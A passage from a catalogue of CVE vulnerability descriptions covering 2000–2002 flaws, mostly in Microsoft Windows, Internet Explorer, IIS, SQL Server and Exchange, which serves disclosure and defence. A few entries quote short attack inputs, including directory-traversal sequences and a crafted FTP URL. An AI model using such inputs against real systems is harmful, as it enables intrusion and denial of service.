cssText property of the stylesheet object, aka "Local Information Disclosure through HTML Object" vulnerability. [CVE-2002-0190] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code under fewer security restrictions via a malformed web page that requires NetBIOS connectivity, aka "Zone Spoofing through Malformed Web Page" vulnerability. [CVE-2002-0188] Microsoft Internet Explorer 5.01 and 6.0 allow remote attackers to execute arbitrary code via malformed Content-Disposition and Content-Type header fields that cause the application for the spoofed file type to pass the file back to the operating system for handling rather than raise an error message, aka the second variant of the "Content Disposition" vulnerability. [CVE-2002-0187] Cross-site scripting vulnerability in the SQLXML component of Microsoft SQL Server 2000 allows an attacker to execute arbitrary script via the root parameter as part of an XML SQL query, aka "Script Injection via XML Tag." [CVE-2002-0186] Buffer overflow in the SQLXML ISAPI extension of Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code via data queries with a long content-type parameter, aka "Unchecked Buffer in SQLXML ISAPI Extension." [CVE-2002-0160] The administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to read HTML, Java class, and image files outside the web root via a ..\.. (modified ..) in the URL to port 2002. [CVE-2002-0159] Format string vulnerability in the administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to crash the CSADMIN module only (denial of service of administration function) or execute arbitrary code via format strings in the URL to port 2002. [CVE-2002-0155] Buffer overflow in Microsoft MSN Chat ActiveX Control, as used in MSN Messenger 4.5 and 4.6, and Exchange Instant Messenger 4.5 and 4.6, allows remote attackers to execute arbitrary code via a long ResDLL parameter in the MSNChat OCX. [CVE-2002-0154] Buffer overflows in extended stored procedures for Microsoft SQL Server 7.0 and 2000 allow remote attackers to cause a denial of service or execute arbitrary code via a database query with certain long arguments. [CVE-2002-0152] Buffer overflow in various Microsoft applications for Macintosh allows remote attackers to cause a denial of service (crash) or execute arbitrary code by invoking the file:// directive with a large number of / characters, which affects Internet Explorer 5.1, Outlook Express 5.0 through 5.0.2, Entourage v. X and 2001, PowerPoint v. X, 2001, and 98, and Excel v. X and 2001 for Macintosh. [CVE-2002-0147] Buffer overflow in the ASP data transfer mechanism in Internet Information Server (IIS) 4.0, 5.0, and 5.1 allows remote attackers to cause a denial of service or execute code, aka "Microsoft-discovered variant of Chunked Encoding buffer overrun." [CVE-2002-0142] CGI handler in John Roy Pi3Web for Windows 2.0 beta 1 and 2 allows remote attackers to cause a denial of service (crash) via a series of requests whose physical path is exactly 260 characters long and ends in a series of . (dot) characters. [CVE-2002-0101] Microsoft Internet Explorer 6.0 and earlier allows local users to cause a denial of service via an infinite loop for modeless dialogs showModelessDialog, which causes CPU usage while the focus for the dialog is not released. [CVE-2002-0078] The zone determination function in Microsoft Internet Explorer 5.5 and 6.0 allows remote attackers to run scripts in the Local Computer zone by embedding the script in a cookie, aka the "Cookie-based Script Execution" vulnerability. [CVE-2002-0077] Microsoft Internet Explorer 5.01, 5.5 and 6.0 treats objects invoked on an HTML page with the codebase property as part of Local Computer zone, which allows remote attackers to invoke executables present on the local system through objects such as the popup object, aka the "Local Executable Invocation via Object tag" vulnerability. [CVE-2002-0076] Java Runtime Environment (JRE) Bytecode Verifier allows remote attackers to escape the Java sandbox and execute commands via an applet containing an illegal cast operation, as seen in (1) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, (2) Netscape 6.2.1 and earlier, and possibly other implementations that use vulnerable versions of SDK or JDK, aka a variant of the "Virtual Machine Verifier" vulnerability. [CVE-2002-0070] Buffer overflow in Windows Shell (used as the Windows Desktop) allows local and possibly remote attackers to execute arbitrary code via a custom URL handler that has not been removed for an application that has been improperly uninstalled. [CVE-2002-0065] Funk Software Proxy Host 3.x uses weak encryption for the Proxy Host password, which allows local users to gain privileges by recovering the passwords from the PHOST.INI file or the Windows registry. [CVE-2002-0058] Vulnerability in Java Runtime Environment (JRE) allows remote malicious web sites to hijack or sniff a web client's sessions, when an HTTP proxy is being used, via a Java applet that redirects the session to another server, as seen in (1) Netscape 6.0 through 6.1 and 4.79 and earlier, (2) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, and possibly other implementations that use vulnerable versions of SDK or JDK. [CVE-2002-0057] XMLHTTP control in Microsoft XML Core Services 2.6 and later does not properly handle IE Security Zone settings, which allows remote attackers to read arbitrary files by specifying a local file as an XML Data Source. [CVE-2002-0053] Buffer overflow in SNMP agent service in Windows 95/98/98SE, Windows NT 4.0, Windows 2000, and Windows XP allows remote attackers to cause a denial of service or execute arbitrary code via a malformed management request. NOTE: this candidate may be split or merged with other candidates. This and other PROTOS-related candidates, especially CVE-2002-0012 and CVE-2002-0013, will be updated when more accurate information is available. [CVE-2002-0051] Windows 2000 allows local users to prevent the application of new group policy settings by opening Group Policy files with exclusive-read access. [CVE-2002-0050] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 allows remote attackers to execute arbitrary code via long authentication data. [CVE-2002-0049] Microsoft Exchange Server 2000 System Attendant gives "Everyone" group privileges to the WinReg key, which could allow remote attackers to read or modify registry keys. [CVE-2002-0021] Network Product Identification (PID) Checker in Microsoft Office v. X for Mac allows remote attackers to cause a denial of service (crash) via a malformed product announcement. [CVE-2002-0020] Buffer overflow in telnet server in Windows 2000 and Interix 2.2 allows remote attackers to execute arbitrary code via malformed protocol options. [CVE-2001-1573] Buffer overflow in smtpscan.dll for Trend Micro InterScan VirusWall 3.51 for Windows NT has allows remote attackers to execute arbitrary code via a certain configuration parameter. [CVE-2001-1571] The Remote Desktop client in Windows XP sends the most recent user account name in cleartext, which could allow remote attackers to obtain terminal server user account names via sniffing. [CVE-2001-1570] Windows XP with fast user switching and account lockout enabled allows local users to deny user account access by setting the fast user switch to the same user (self) multiple times, which causes other accounts to be locked out. [CVE-2001-1560] Win32k.sys (aka Graphics Device Interface (GDI)) in Windows 2000 and XP allows local users to cause a denial of service (system crash) by calling the ShowWindow function after receiving a WM_NCCREATE message. [CVE-2001-1552] ssdpsrv.exe in Windows ME allows remote attackers to cause a denial of service by sending multiple newlines in a Simple Service Discovery Protocol (SSDP) message. NOTE: multiple replies to the original post state that the problem could not be reproduced. [CVE-2001-1549] Tiny Personal Firewall 1.0 and 2.0 allows local users to bypass filtering via non-standard TCP packets created with non-Windows protocol adapters. [CVE-2001-1548] ZoneAlarm 2.1 through 2.6 and ZoneAlarm Pro 2.4 and 2.6 allows local users to bypass filtering via non-standard TCP packets created with non-Windows protocol adapters. [CVE-2001-1533] DISPUTED * Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service via a flood of fragmented UDP packets. NOTE: the vendor disputes this issue, saying that it requires high bandwidth to exploit, and the server does not experience any instability. Therefore this "laws of physics" issue might not be included in CVE. [CVE-2001-1519] DISPUTED RunAs (runas.exe) in Windows 2000 allows local users to create a spoofed named pipe when the service is stopped, then capture cleartext usernames and passwords when clients connect to the service. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it. [CVE-2001-1518] RunAs (runas.exe) in Windows 2000 only creates one session instance at a time, which allows local users to cause a denial of service (RunAs hang) by creating a named pipe session with the authentication server without any request for service. NOTE: the vendor disputes this vulnerability, however the vendor also presents a scenario in which other users could be affected if running on a Terminal Server. Therefore this is a vulnerability. [CVE-2001-1517] DISPUTED RunAs (runas.exe) in Windows 2000 stores cleartext authentication information in memory, which could allow attackers to obtain usernames and passwords by executing a process that is allocated the same memory page after termination of a RunAs command. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it, and the original researcher did not respond to requests for additional information. [CVE-2001-1515] Macintosh clients, when using NT file system volumes on Windows 2000 SP1, create subdirectories and automatically modify the inherited NTFS permissions, which may cause the directories to have less restrictive permissions than intended. [CVE-2001-1514] ColdFusion 4.5 and 5, when running on Windows with the advanced security sandbox type set to "operating system," does not properly pass security context to (1) child processes created with <CFEXECUTE> and (2) child processes that call the CreateProcess function and are executed with <CFOBJECT> or end with the CFX extension, which allows attackers to execute programs with the permissions of the System account. [CVE-2001-1497] Microsoft Internet Explorer 4.0 through 6.0 could allow local users to differentiate between alphanumeric and non-alphanumeric characters used in a password by pressing certain control keys that jump between non-alphanumeric characters, which makes it easier to conduct a brute-force password guessing attack. [CVE-2001-1489] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images. [CVE-2001-1462] WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to cause the WebID agent to enter debug mode via a URL containing null characters, which may allow attackers to obtain sensitive information. [CVE-2001-1461] Directory traversal vulnerability in WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to access restricted resources via URL-encoded (1) /.. or (2) \.. sequences. [CVE-2001-1452] By default, DNS servers on Windows NT 4.0 and Windows 2000 Server cache glue records received from non-delegated name servers, which allows remote attackers to poison the DNS cache via spoofed DNS responses. [CVE-2001-1450] Microsoft Internet Explorer 5.0 through 6.0 allows attackers to cause a denial of service (browser crash) via a crafted FTP URL such as "/.#./". [CVE-2001-1410] Internet Explorer 6 and earlier allows remote attackers to create chromeless windows using the Javascript window.createPopup method, which could allow attackers to simulate a victim's display and conduct unauthorized activities or steal sensitive data via social engineering. [CVE-2001-1347] Windows 2000 allows local users to cause a denial of service and possibly gain privileges by setting a hardware breakpoint that is handled using global debug registers, which could cause other processes to terminate due to an exception, and allow hijacking of resources such as named pipes. [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer. [CVE-2001-1326] Eudora 5.1 allows remote attackers to execute arbitrary code when the "Use Microsoft Viewer" option is enabled and the "allow executables in HTML content" option is disabled, via an HTML email with a form that is activated from an image that the attacker spoofs as a link, which causes the user to execute the form and access embedded attachments. [CVE-2001-1325] Internet Explorer 5.0 and 5.5, and Outlook Express 5.0 and 5.5, allow remote attackers to execute scripts when Active Scripting is disabled by including the scripts in XML stylesheets (XSL) that are referenced using an IFRAME tag, possibly due to a vulnerability in Windows Scripting Host (WSH). [CVE-2001-1319] Microsoft Exchange 5.5 2000 allows remote attackers to cause a denial of service (hang) via exceptional BER encodings for the LDAP filter type field, as demonstrated by the PROTOS LDAPv3 test suite. [CVE-2001-1302] The change password option in the Windows Security interface for Windows 2000 allows attackers to use the option to attempt to change passwords of other users on other systems or identify valid accounts by monitoring error messages, possibly due to a problem in the NetuserChangePassword function. [CVE-2001-1288] Windows 2000 and Windows NT allows local users to cause a denial of service (reboot) by executing a command at the command prompt and pressing the F7 and enter keys several times while the command is executing, possibly related to an exception handling error in csrss.exe. [CVE-2001-1243] Scripting.FileSystemObject in asp.dll for Microsoft IIS 4.0 and 5.0 allows local or remote attackers to cause a denial of service (crash) via (1) creating an ASP program that uses Scripting.FileSystemObject to open a file with an MS-DOS device name, or (2) remotely injecting the device name into ASP programs that internally use Scripting.FileSystemObject. [CVE-2001-1238] Task Manager in Windows 2000 does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped with the Task Manager. [CVE-2001-1219] Microsoft Internet Explorer 6.0 and earlier allows malicious website operators to cause a denial of service (client crash) via JavaScript that continually refreshes the window via self.location. [CVE-2001-1218] Microsoft Internet Explorer for Unix 5.0SP1 allows local users to possibly cause a denial of service (crash) in CDE or the X server on Solaris 2.6 by rapidly scrolling Chinese characters or maximizing the window. [CVE-2001-1192] Citrix Independent Computing Architecture (ICA) Client for Windows 6.1 allows remote malicious web sites to execute arbitrary code via a .ICA file, which is downloaded and automatically executed by the client. [CVE-2001-1186] Microsoft IIS 5.0 allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents IIS from timing out the connection. [CVE-2001-1122] Windows NT 4.0 SP 6a allows a local user with write access to winnt/system32 to cause a denial of service (crash in lsass.exe) by running the NT4ALL exploit program in 'SPECIAL' mode. [CVE-2001-1116] Identix BioLogon 2.03 and earlier does not lock secondary displays on a multi-monitor system running Windows 98 or ME, which allows an attacker with physical access to the system to bypass authentication through a secondary display. [CVE-2001-1099] The default configuration of Norton AntiVirus for Microsoft Exchange 2000 2.x allows remote attackers to identify the recipient's INBOX file path by sending an email with an attachment containing malicious content, which includes the path in the rejection notice. [CVE-2001-1088] Microsoft Outlook 8.5 and earlier, and Outlook Express 5 and earlier, with the "Automatically put people I reply to in my address book" option enabled, do not notify the user when the "Reply-To" address is different than the "From" address, which could allow an untrusted remote attacker to spoof legitimate addresses and intercept email from the client that is intended for another user. [CVE-2001-0986] SQLQHit.asp sample file in Microsoft Index Server 2.0 allows remote attackers to obtain sensitive information such as the physical path, file attributes, or portions of source code by directly calling sqlqhit.asp with a CiScope parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo. [CVE-2001-0951] Windows 2000 allows remote attackers to cause a denial of service (CPU consumption) by flooding Internet Key Exchange (IKE) UDP port 500 with packets that contain a large number of dot characters. [CVE-2001-0919] Internet Explorer 5.50.4134.0100 on Windows ME with "Prompt to allow cookies to be stored on your machine" enabled does not warn a user when a cookie is set using Javascript. [CVE-2001-0902] Microsoft IIS 5.0 allows remote attackers to spoof web log entries via an HTTP request that includes hex-encoded newline or form-feed characters. [CVE-2001-0877] Universal Plug and Play (UPnP) on Windows 98, 98SE, ME, and XP allows remote attackers to cause a denial of service via (1) a spoofed SSDP advertisement that causes the client to connect to a service on another machine that generates a large amount of traffic (e.g., chargen), or (2) via a spoofed SSDP announcement to broadcast or multicast addresses, which could cause all UPnP clients to send traffic to a single target system. [CVE-2001-0876] Buffer overflow in Universal Plug and Play (UPnP) on Windows 98, 98SE, ME, and XP allows remote attackers to execute arbitrary code via a NOTIFY directive with a long Location URL. [CVE-2001-0860] Terminal Services Manager MMC in Windows 2000 and XP trusts the Client Address (IP address) that is provided by the client instead of obtaining it from the packet headers, which allows clients to spoof their public IP address, e.g. through a Network Address Translation (NAT). [CVE-2001-0845] Vulnerability in DECwindows Motif Server on OpenVMS VAX or Alpha 6.2 through 7.3, and SEVMS VAX or Alpha 6.2, allows local users to gain access to unauthorized resources. [CVE-2001-0791] Trend Micro InterScan VirusWall for Windows NT allows remote attackers to make configuration changes by directly calling certain CGI programs, which do not restrict access. [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters. [CVE-2001-0726] Outlook Web Access (OWA) in Microsoft Exchange 5.5 Server, when used with Internet Explorer, does not properly detect certain inline script, which can allow remote attackers to perform arbitrary actions on a user's Exchange mailbox via an HTML e-mail message. [CVE-2001-0721] Universal Plug and Play (UPnP) in Windows 98, 98SE, ME, and XP allows remote attackers to cause a denial of service (memory consumption or crash) via a malformed UPnP request. [CVE-2001-0718] Vulnerability in (1) Microsoft Excel 2002 and earlier and (2) Microsoft PowerPoint 2002 and earlier allows attackers to bypass macro restrictions and execute arbitrary commands by modifying the data stream in the document. [CVE-2001-0709] Microsoft IIS 4.0 and before, when installed on a FAT partition, allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode. [CVE-2001-0687] Broker FTP server 5.9.5 for Windows NT and 9x allows a remote attacker to retrieve privileged web server system information by (1) issuing a CD command (CD C:) followed by the LS command, (2) specifying arbitrary paths in the UNC format (\\computername\sharename). [CVE-2001-0678] A buffer overflow in reggo.dll file used by Trend Micro InterScan VirusWall prior to 3.51 build 1349 for Windows NT 3.5 and InterScan WebManager 1.2 allows a local attacker to execute arbitrary code. [CVE-2001-0675] Rit Research Labs The Bat! 1.51 for Windows allows a remote attacker to cause a denial of service by sending an email to a user's account containing a carrage return <CR> that is not followed by a line feed <LF>. [CVE-2001-0669] Various Intrusion Detection Systems (IDS) including (1) Cisco Secure Intrusion Detection System, (2) Cisco Catalyst 6000 Intrusion Detection System Module, (3) Dragon Sensor 4.x, (4) Snort before 1.8.1, (5) ISS RealSecure Network Sensor 5.x and 6.x before XPU 3.2, and (6) ISS RealSecure Server Sensor 5.5 and 6.0 for Windows, allow remote attackers to evade detection of HTTP attacks via non-standard "%u" Unicode encoding of ASCII characters in the requested URL. [CVE-2001-0666] Outlook Web Access (OWA) in Microsoft Exchange 2000 allows an authenticated user to cause a denial of service (CPU consumption) via a malformed OWA request for a deeply nested folder within the user's mailbox. [CVE-2001-0663] Terminal Server in Windows NT and Windows 2000 allows remote attackers to cause a denial of service via a sequence of invalid Remote Desktop Protocol (RDP) packets. [CVE-2001-0662] RPC endpoint mapper in Windows NT 4.0 allows remote attackers to cause a denial of service (loss of RPC services) via a malformed request. [CVE-2001-0660] Outlook Web Access (OWA) in Microsoft Exchange 5.5, SP4 and earlier, allows remote attackers to identify valid user email addresses by directly accessing a back-end function that processes the global address list (GAL). [CVE-2001-0659] Buffer overflow in IrDA driver providing infrared data exchange on Windows 2000 allows attackers who are physically close to the machine to cause a denial of service (reboot) via a malformed IrDA packet. [CVE-2001-0658] Cross-site scripting (CSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause other clients to execute certain script or read cookies via malicious script in an invalid URL that is not properly quoted in an error message. [CVE-2001-0628] Microsoft Word 2000 does not check AutoRecovery (.asd) files for macros, which allows a local attacker to execute arbitrary macros with the user ID of the Word user. [CVE-2001-0547] Memory leak in the proxy service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows local attackers to cause a denial of service (resource exhaustion). [CVE-2001-0546] Memory leak in H.323 Gatekeeper Service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (resource exhaustion) via a large amount of malformed H.323 data. [CVE-2001-0543] Memory leak in NNTP service in Windows NT 4.0 and Windows 2000 allows remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed posts. [CVE-2001-0542] Buffer overflows in Microsoft SQL Server 7.0 and 2000 allow attackers with access to SQL Server to execute arbitrary code through the functions (1) raiserror, (2) formatmessage, or (3) xp_sprintf. NOTE: the C runtime format string vulnerability reported in MS01-060 is identified by CVE-2001-0879. [CVE-2001-0540] Memory leak in Terminal servers in Windows NT and Windows 2000 allows remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed Remote Desktop Protocol (RDP) requests to port 3389. [CVE-2001-0538] Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page. [CVE-2001-0513] Oracle listener process on Windows NT redirects connection requests to another port and creates a separate thread to process the request, which allows remote attackers to cause a denial of service by repeatedly connecting to the Oracle listener but not connecting to the redirected port. [CVE-2001-0505] Multiple memory leaks in Microsoft Services for Unix 2.0 allow remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed requests to (1) the Telnet service, or (2) the NFS service. [CVE-2001-0503] Microsoft NetMeeting 3.01 with Remote Desktop Sharing enabled allows remote attackers to cause a denial of service via a malformed string to the NetMeeting service port, aka a variant of the "NetMeeting Desktop Sharing" vulnerability. [CVE-2001-0502] Running Windows 2000 LDAP Server over SSL, a function does not properly check the permissions of a user request when the directory principal is a domain user and the data attribute is the domain password, which allows local users to modify the login password of other users. [CVE-2001-0501] Microsoft Word 2002 and earlier allows attackers to automatically execute macros without warning the user by embedding the macros in a manner that escapes detection by the security scanner. [CVE-2001-0382] Computer Associates CCC\Harvest 5.0 for Windows NT/2000 uses weak encryption for passwords, which allows a remote attacker to gain privileges on the application. [CVE-2001-0373] The default configuration of the Dr. Watson program in Windows NT and Windows 2000 generates user.dmp crash dump files with world-readable permissions, which could allow a local user to gain access to sensitive information. [CVE-2001-0365] Eudora before 5.1 allows a remote attacker to execute arbitrary code, when the 'Use Microsoft Viewer' and 'allow executables in HTML content' options are enabled, via an HTML email message containing Javascript, with ActiveX controls and malicious code within IMG tags. [CVE-2001-0364] SSH Communications Security sshd 2.4 for Windows allows remote attackers to create a denial of service via a large number of simultaneous connections. [CVE-2001-0344] An SQL query method in Microsoft SQL Server 2000 Gold and 7.0 using Mixed Mode allows local database users to gain privileges by reusing a cached connection of the sa administrator account. [CVE-2001-0341] Buffer overflow in Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions allows remote attackers to execute arbitrary commands via a long registration request (URL) to fp30reg.dll. [CVE-2001-0340] An interaction between the Outlook Web Access (OWA) service in Microsoft Exchange 2000 Server and Internet Explorer allows attackers to execute malicious script code against a user's mailbox via a message attachment that contains HTML code, which is executed automatically. [CVE-2001-0337] The Microsoft MS01-014 and MS01-016 patches for IIS 5.0 and earlier introduce a memory leak which allows attackers to cause a denial of service via a series of requests. [CVE-2001-0336] The Microsoft MS00-060 patch for IIS 5.0 and earlier introduces an error which allows attackers to cause a denial of service via a malformed request. [CVE-2001-0324] Windows 98 and Windows 2000 Java clients allow remote attackers to cause a denial of service via a Java applet that opens a large number of UDP sockets, which prevents the host from establishing any additional UDP connections, and possibly causes a crash. [CVE-2001-0281] Format string vulnerability in DbgPrint function, used in debug messages for some Windows NT drivers (possibly when called through DebugMessage), may allow local users to gain privileges. [CVE-2001-0265] ASCII Armor parser in Windows PGP 7.0.3 and earlier allows attackers to create files in arbitrary locations via a malformed ASCII armored file. [CVE-2001-0244] Buffer overflow in Microsoft Index Server 2.0 allows remote attackers to execute arbitrary commands via a long search parameter. [CVE-2001-0243] Windows Media Player 7 and earlier stores Internet shortcuts in a user's Temporary Files folder with a fixed filename instead of in the Internet Explorer cache, which causes the HTML in those shortcuts to run in the Local Computer Zone instead of the Internet Zone, which allows remote attackers to read certain files. [CVE-2001-0241] Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0. [CVE-2001-0240] Microsoft Word before Word 2002 allows attackers to automatically execute macros without warning the user via a Rich Text Format (RTF) document that links to a template with the embedded macro. [CVE-2001-0239] Microsoft Internet Security and Acceleration (ISA) Server 2000 Web Proxy allows remote attackers to cause a denial of service via a long web request with a specific type. [CVE-2001-0238] Microsoft Data Access Component Internet Publishing Provider 8.103.2519.0 and earlier allows remote attackers to bypass Security Zone restrictions via WebDAV requests. [CVE-2001-0237] Memory leak in Microsoft 2000 domain controller allows remote attackers to cause a denial of service by repeatedly connecting to the Kerberos service and then disconnecting without sending any data. [CVE-2001-0191] gnuserv before 3.12, as shipped with XEmacs, does not properly check the specified length of an X Windows MIT-MAGIC-COOKIE cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length. [CVE-2001-0152] The password protection option for the Compressed Folders feature in Plus! for Windows 98 and Windows Me writes password information to a file, which allows local users to recover the passwords and read the compressed folders. [CVE-2001-0149] Windows Scripting Host in Internet Explorer 5.5 and earlier allows remote attackers to read arbitrary files via the GetObject Javascript function and the htmlfile ActiveX object. [CVE-2001-0148] The WMP ActiveX Control in Windows Media Player 7 allows remote attackers to execute commands in Internet Explorer via javascript URLs, a variant of the "Frame Domain Verification" vulnerability. [CVE-2001-0147] Buffer overflow in Windows 2000 event viewer snap-in allows attackers to execute arbitrary commands via a malformed field that is improperly handled during the detailed view of event records. [CVE-2001-0146] IIS 5.0 and Microsoft Exchange 2000 allow remote attackers to cause a denial of service (memory allocation error) by repeatedly sending a series of specially formatted URL's. [CVE-2001-0137] Windows Media Player 7 allows remote attackers to execute malicious Java applets in Internet Explorer clients by enclosing the applet in a skin file named skin.wmz, then referencing that skin in the codebase parameter to an applet tag, aka the Windows Media Player Skins File Download" vulnerability. [CVE-2001-0083] Windows Media Unicast Service in Windows Media Services 4.0 and 4.1 does not properly shut down some types of connections, producing a memory leak that allows remote attackers to cause a denial of service via a series of severed connections, aka the "Severed Windows Media Server Connection" vulnerability. [CVE-2001-0048] The "Configure Your Server" tool in Microsoft 2000 domain controllers installs a blank password for the Directory Service Restore Mode, which allows attackers with physical access to the controller to install malicious programs, aka the "Directory Service Restore Mode Password" vulnerability. [CVE-2001-0046] The default permissions for the SNMP Parameters registry key in Windows NT 4.0 allows remote attackers to read and possibly modify the SNMP community strings to obtain sensitive information or modify network configuration, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0045] The default permissions for the RAS Administration key in Windows NT 4.0 allows local users to execute arbitrary commands by changing the value to point to a malicious DLL, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0018] Windows 2000 domain controller in Windows 2000 Server, Advanced Server, or Datacenter Server allows remote attackers to cause a denial of service via a flood of malformed service requests. [CVE-2001-0017] Memory leak in PPTP server in Windows NT 4.0 allows remote attackers to cause a denial of service via a malformed data packet, aka the "Malformed PPTP Packet Stream" vulnerability. [CVE-2001-0015] Network Dynamic Data Exchange (DDE) in Windows 2000 allows local users to gain SYSTEM privileges via a "WM_COPYDATA" message to an invisible window that is running with the privileges of the WINLOGON process. [CVE-2001-0014] Remote Data Protocol (RDP) in Windows 2000 Terminal Service does not properly handle certain malformed packets, which allows remote attackers to cause a denial of service, aka the "Invalid RDP Data" vulnerability. [CVE-2001-0006] The Winsock2ProtocolCatalogMutex mutex in Windows NT 4.0 has inappropriate Everyone/Full Control permissions, which allows local users to modify the permissions to "No Access" and disable Winsock network connectivity to cause a denial of service, aka the "Winsock Mutex" vulnerability. [CVE-2001-0005] Buffer overflow in the parsing mechanism of the file loader in Microsoft PowerPoint 2000 allows attackers to execute arbitrary commands. [CVE-2000-1227] Windows NT 4.0 and Windows 2000 hosts allow remote attackers to cause a denial of service (unavailable connections) by sending multiple SMB SMBnegprots requests but not reading the response that is sent back. [CVE-2000-1209] The "sa" account is installed with a default null password on (1) Microsoft SQL Server 2000, (2) SQL Server 7.0, and (3) Data Engine (MSDE) 1.0, including third party packages that use these products such as (4) Tumbleweed Secure Mail (MMS) (5) Compaq Insight Manager, and (6) Visio 2000, which allows remote attackers to gain privileges, as exploited by worms such as Voyager Alpha Force and Spida. [CVE-2000-1200] Windows NT allows remote attackers to list all users in a domain by obtaining the domain SID with the LsaQueryInformationPolicy policy function via a null session and using the SID to list the users. [CVE-2000-1149] Buffer overflow in RegAPI.DLL used by Windows NT 4.0 Terminal Server allows remote attackers to execute arbitrary commands via a long username, aka the "Terminal Server Login Buffer Overflow" vulnerability. [CVE-2000-1139] The installation of Microsoft Exchange 2000 before Rev. A creates a user account with a known password, which could allow attackers to gain privileges, aka the "Exchange User Account" vulnerability. [CVE-2000-1111] Telnet Service for Windows 2000 Professional does not properly terminate incomplete connection attempts, which allows remote attackers to cause a denial of service by connecting to the server and not providing any input. [CVE-2000-1105] The ixsso.query ActiveX Object is marked as safe for scripting, which allows malicious web site operators to embed a script that remotely determines the existence of files on visiting Windows 2000 systems that have Indexing Services enabled. [CVE-2000-1090] Microsoft IIS for Far East editions 4.0 and 5.0 allows remote attackers to read source code for parsed pages via a malformed URL that uses the lead-byte of a double-byte character. [CVE-2000-1089] Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability. [CVE-2000-1088] The xp_SetSQLSecurity function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1087] The xp_proxiedmetadata function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1086] The xp_printstatements function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1085] The xp_peekqueue function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1084] The xp_updatecolvbm function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1083] The xp_showcolv function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1082] The xp_enumresultset function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1081] The xp_displayparamstmt function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1071] The GUI installation for iCal 2.1 Patch 2 disables access control for the X server using an "xhost +" command, which allows remote attackers to monitor X Windows events and gain privileges. [CVE-2000-1061] Microsoft Virtual Machine 